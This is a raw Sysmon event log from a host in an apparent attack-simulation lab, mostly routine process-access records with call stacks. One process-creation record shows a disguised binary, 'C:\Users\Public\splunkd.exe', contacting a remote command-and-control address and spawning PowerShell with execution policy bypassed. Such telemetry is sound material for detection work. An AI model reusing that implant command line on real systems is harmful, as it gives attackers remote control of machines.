13:34:15.299{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001309Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:15.299{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001308Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:15.299{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001307Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:15.299{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001306Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:15.298{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001305Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:15.298{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E57-6005-3600-00000000A301}3364C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001304Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:15.252{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E57-6005-3500-00000000A301}3248C:\Windows\System32\vds.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001303Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:15.247{59A5CD1D-8E44-6005-0B00-00000000A301}856988C:\Windows\system32\lsass.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+25d17|C:\Windows\system32\lsasrv.dll+26ded|C:\Windows\system32\lsasrv.dll+25b95|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001302Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:15.247{59A5CD1D-8E44-6005-0B00-00000000A301}856988C:\Windows\system32\lsass.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\system32\lsasrv.dll+25add|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001301Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:15.246{59A5CD1D-8E4A-6005-2400-00000000A301}29242944C:\Windows\system32\conhost.exe{59A5CD1D-8E57-6005-3600-00000000A301}3364C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001300Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:15.244{59A5CD1D-8E44-6005-0500-00000000A301}640656C:\Windows\system32\csrss.exe{59A5CD1D-8E57-6005-3600-00000000A301}3364C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000001299Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:15.244{59A5CD1D-8E4A-6005-2300-00000000A301}29162976C:\Users\Public\splunkd.exe{59A5CD1D-8E57-6005-3600-00000000A301}3364C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Users\Public\splunkd.exe+5c36e 154100x80000000000000001298Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:15.240{59A5CD1D-8E57-6005-3600-00000000A301}3364C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe10.0.14393.206 (rs1_release.160915-0644)Windows PowerShellMicrosoft® Windows® Operating SystemMicrosoft CorporationPowerShell.EXEpowershell.exe -ExecutionPolicy Bypass -C lyzffwC:\Windows\system32\NT AUTHORITY\SYSTEM{59A5CD1D-8E44-6005-E703-000000000000}0x3e70SystemMD5=097CE5761C89434367598B34FE32893B,SHA256=BA4038FD20E474C047BE8AAD5BFACDB1BFC1DDBE12F803F473B7918D8D819436,IMPHASH=CAEE994F79D85E47C06E5FA9CDEAE453{59A5CD1D-8E4A-6005-2300-00000000A301}2916C:\Users\Public\splunkd.exe"C:\Users\Public\splunkd.exe" -socket 10.0.1.12:7010 -http http://10.0.1.12:8888 -contact tcp 10341000x80000000000000001297Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:15.223{59A5CD1D-8E46-6005-0C00-00000000A301}596484C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001296Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:15.223{59A5CD1D-8E46-6005-0C00-00000000A301}596484C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001295Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:15.223{59A5CD1D-8E46-6005-0C00-00000000A301}596484C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001294Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:15.198{59A5CD1D-8E44-6005-0A00-00000000A301}8481100C:\Windows\system32\services.exe{59A5CD1D-8E57-6005-3500-00000000A301}3248C:\Windows\System32\vds.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\system32\services.exe+1713f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001293Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:15.195{59A5CD1D-8E44-6005-0A00-00000000A301}8481100C:\Windows\system32\services.exe{59A5CD1D-8E56-6005-2D00-00000000A301}2220C:\Program Files\Amazon\SSM\amazon-ssm-agent.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\system32\services.exe+1713f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001292Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:15.157{59A5CD1D-8E44-6005-0500-00000000A301}640756C:\Windows\system32\csrss.exe{59A5CD1D-8E57-6005-3500-00000000A301}3248C:\Windows\System32\vds.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000001291Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:15.157{59A5CD1D-8E44-6005-0A00-00000000A301}8482684C:\Windows\system32\services.exe{59A5CD1D-8E57-6005-3500-00000000A301}3248C:\Windows\System32\vds.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\KERNEL32.DLL+1d37f|C:\Windows\system32\services.exe+307d|C:\Windows\system32\services.exe+6334|C:\Windows\system32\services.exe+dc24|C:\Windows\system32\services.exe+d248|C:\Windows\system32\services.exe+4d0c|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000001290Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:15.146{59A5CD1D-8E57-6005-3500-00000000A301}3248C:\Windows\System32\vds.exe10.0.14393.4169 (rs1_release.210107-1130)Virtual Disk ServiceMicrosoft® Windows® Operating SystemMicrosoft Corporationvds.exeC:\Windows\System32\vds.exeC:\Windows\system32\NT AUTHORITY\SYSTEM{59A5CD1D-8E44-6005-E703-000000000000}0x3e70SystemMD5=F43B67F8FB870A731294662603690C2F,SHA256=9707255C9778F9A8135BAA4F1A16FAC9EBF2991FD6AF937B232D5FA52D14AC33,IMPHASH=3F541E0A1D775ACA4A7D5FBDFF8433C5{59A5CD1D-8E44-6005-0A00-00000000A301}848C:\Windows\System32\services.exeC:\Windows\system32\services.exe 10341000x80000000000000001289Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:15.142{59A5CD1D-8E44-6005-0B00-00000000A301}856988C:\Windows\system32\lsass.exe{59A5CD1D-8E44-6005-0A00-00000000A301}848C:\Windows\system32\services.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1e0a8|C:\Windows\system32\lsasrv.dll+1d2d1|C:\Windows\system32\lsasrv.dll+1bb00|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001288Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:15.142{59A5CD1D-8E46-6005-0C00-00000000A301}596484C:\Windows\system32\svchost.exe{59A5CD1D-8E44-6005-0B00-00000000A301}856C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f86b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001287Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:15.142{59A5CD1D-8E46-6005-0C00-00000000A301}596484C:\Windows\system32\svchost.exe{59A5CD1D-8E44-6005-0B00-00000000A301}856C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f71b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001286Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:15.142{59A5CD1D-8E44-6005-0B00-00000000A301}856988C:\Windows\system32\lsass.exe{59A5CD1D-8E44-6005-0A00-00000000A301}848C:\Windows\system32\services.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+1b05d|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001285Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:15.131{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E57-6005-3400-00000000A301}3156C:\Windows\System32\vdsldr.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001284Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:15.081{59A5CD1D-8E44-6005-0500-00000000A301}6401180C:\Windows\system32\csrss.exe{59A5CD1D-8E56-6005-2D00-00000000A301}2220C:\Program Files\Amazon\SSM\amazon-ssm-agent.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000001283Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:15.081{59A5CD1D-8E44-6005-0A00-00000000A301}848924C:\Windows\system32\services.exe{59A5CD1D-8E56-6005-2D00-00000000A301}2220C:\Program 